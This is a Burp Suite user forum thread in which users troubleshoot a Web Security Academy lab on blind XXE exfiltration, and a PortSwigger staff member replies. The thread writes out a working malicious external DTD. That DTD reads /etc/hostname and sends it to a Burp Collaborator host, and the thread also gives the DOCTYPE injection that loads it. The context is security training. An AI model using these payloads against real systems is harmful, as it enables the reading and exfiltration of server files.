Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Lab: Exploiting blind XXE to exfiltrate data using a malicious external DTD

Chris | Last updated: Nov 02, 2019 08:06AM UTC

Hi I'm having trouble with this lab I think I'm doing it right but not sure every time I try it nothing happens. So the challenge is I need to use burpcollaborator to get a dns and http response. I go to Go to exploit server and store my dtd file in the file. then I get my url and put it in this command <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]> %xxe;]> then I send it in repeater and I look at my burpcollaborator and click poll now and nothing happens. Please let me know if I'm for getting a step or some thing. Using Burp Suite Professional, go to the Burp menu, and launch the Burp Collaborator client. Click "Copy to clipboard" to copy a unique Burp Collaborator payload to your clipboard. Leave the Burp Collaborator client window open. Place the Burp Collaborator payload into a malicious DTD file: <!ENTITY % file SYSTEM "file:///etc/hostname"> <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://I have put my subdomain.burpcollaborator.net/?x=%file;'>"> %eval; %exfil; Click "Go to exploit server" and save the malicious DTD file on your server. Click "View stored response" and take a note of the URL. Then exploit the stock checker feature by adding a parameter entity referring to the malicious DTD. Visit a product page, click "Check stock", and intercept the resulting POST request in Burp Suite. Insert the following external entity definition in between the XML declaration and the stockCheck element: <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "I have put my url"> %xxe;]> Go back to the Burp Collaborator client window, and click "Poll now". If you don't see any interactions listed, wait a few seconds and try again. You should see some DNS and HTTP interactions that were initiated by the application as the result of your payload. The HTTP interaction could contain the contents of the /etc/hostname file.

Ben, PortSwigger Agent | Last updated: Nov 04, 2019 08:32AM UTC

Hi, Thank you for your message. The process you are following looks correct to me. I have just attempted this lab and was able to solve it using the solution provided so the lab is working correctly. A couple of things to look out for: Are you copying the full Burp Collaborator payload correctly, i.e. something like http://qc62a6b7j69sdkfypp1g03murlxcl1.burpcollaborator.net Are you copying the correct exploit URL? This should be the URL that is in the address bar after you click the View exploit button i.e. something like https://acfb1fc51f86054780b0109501b3009b.web-security-academy.net/exploit Lastly, we have had the occasional issue when users have copied the text directly from the solution (sometimes unrecognised characters have slipped into the text, which has affected the viability of the answer) so it is also worth typing out the various payloads etc rather than copying them directly. Please let us know if you need any further assistance.

Juliano | Last updated: Oct 05, 2020 04:27PM UTC

Hi I am having similar issues. When i paste the payload <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]> I get a parsing error. I'm still able to poll the traffic get the DNS and HTTP traffic. but /etc/file/hostname does not show in my response. This is what i have in my repeater. <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://xxxxxxx.web-security-academy.net/exploit"> %xxe;]> <stockCheck> <productId> 1 </productId> <storeId> 1 </storeId> </stockCheck>

Ben, PortSwigger Agent | Last updated: Oct 06, 2020 07:33AM UTC

Hi Juliano, One of our users makes very good video solutions of our labs. The solution to this lab is below - it might be useful to you to view the video and check to see if you are on the right track: https://www.youtube.com/watch?v=glA5FwCdspk

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.